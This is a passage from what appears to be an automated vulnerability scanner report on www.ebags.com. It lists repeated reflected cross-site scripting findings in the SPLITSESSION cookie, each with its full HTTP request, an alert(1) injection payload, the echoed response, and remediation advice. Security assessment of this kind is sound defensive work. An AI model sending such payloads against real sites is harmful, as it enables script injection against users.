Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/kalencom HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C77446'%3balert(1)//b3a84a8c4d6; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:16:13 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:13 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 103300


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|77446';alert(1)//b3a84a8c4d6');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.36. http://www.ebags.com/brand/lego [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/lego

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6a3c'%3balert(1)//0364fe4302b was submitted in the SPLITSESSION cookie. This input was echoed as b6a3c';alert(1)//0364fe4302b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/lego HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cb6a3c'%3balert(1)//0364fe4302b; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:16:02 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:02 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|b6a3c';alert(1)//0364fe4302b');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.37. http://www.ebags.com/brand/lodis [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/lodis

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6682f'%3balert(1)//44af505a2a1 was submitted in the SPLITSESSION cookie. This input was echoed as 6682f';alert(1)//44af505a2a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/lodis HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C6682f'%3balert(1)//44af505a2a1; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:11 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 112625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|6682f';alert(1)//44af505a2a1');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.38. http://www.ebags.com/brand/michael-michael-kors-watches [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/michael-michael-kors-watches

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7964a'%3balert(1)//73649ca36b5 was submitted in the SPLITSESSION cookie. This input was echoed as 7964a';alert(1)//73649ca36b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/michael-michael-kors-watches HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C7964a'%3balert(1)//73649ca36b5; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:02 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:02 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106657


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|7964a';alert(1)//73649ca36b5');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.39. http://www.ebags.com/brand/quiksilver [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/quiksilver

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27cfb'%3balert(1)//b526ef537e0 was submitted in the SPLITSESSION cookie. This input was echoed as 27cfb';alert(1)//b526ef537e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/quiksilver HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C27cfb'%3balert(1)//b526ef537e0; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 59141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|27cfb';alert(1)//b526ef537e0');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.40. http://www.ebags.com/brand/timi-and-leslie [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/timi-and-leslie

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85fde'%3balert(1)//59caba9823 was submitted in the SPLITSESSION cookie. This input was echoed as 85fde';alert(1)//59caba9823 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/timi-and-leslie HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C85fde'%3balert(1)//59caba9823; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:16:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 67812


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|85fde';alert(1)//59caba9823');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.41. http://www.ebags.com/brands/department/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brands/department/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b22a'%3balert(1)//865f579b997 was submitted in the SPLITSESSION cookie. This input was echoed as 9b22a';alert(1)//865f579b997 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brands/department/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C9b22a'%3balert(1)//865f579b997; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:04 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:05:04 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 75286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822PRODUCTID=');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|9b22a';alert(1)//865f579b997');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.42. http://www.ebags.com/brands/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brands/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3122a'%3balert(1)//48b6210c93f was submitted in the SPLITSESSION cookie. This input was echoed as 3122a';alert(1)//48b6210c93f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brands/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C3122a'%3balert(1)//48b6210c93f; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:47 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:47 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 280168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|3122a';alert(1)//48b6210c93f');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.43. http://www.ebags.com/category/backpack-handbags/20036676 [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/backpack-handbags/20036676

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78da4'%3balert(1)//4158ffbec4e was submitted in the SPLITSESSION cookie. This input was echoed as 78da4';alert(1)//4158ffbec4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/backpack-handbags/20036676 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C78da4'%3balert(1)//4158ffbec4e; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:45 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:45 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 111958


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|78da4';alert(1)//4158ffbec4e');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.44. http://www.ebags.com/category/clutches/20036679 [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/clutches/20036679

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4748f'%3balert(1)//b29ffd2f072 was submitted in the SPLITSESSION cookie. This input was echoed as 4748f';alert(1)//b29ffd2f072 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/clutches/20036679 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
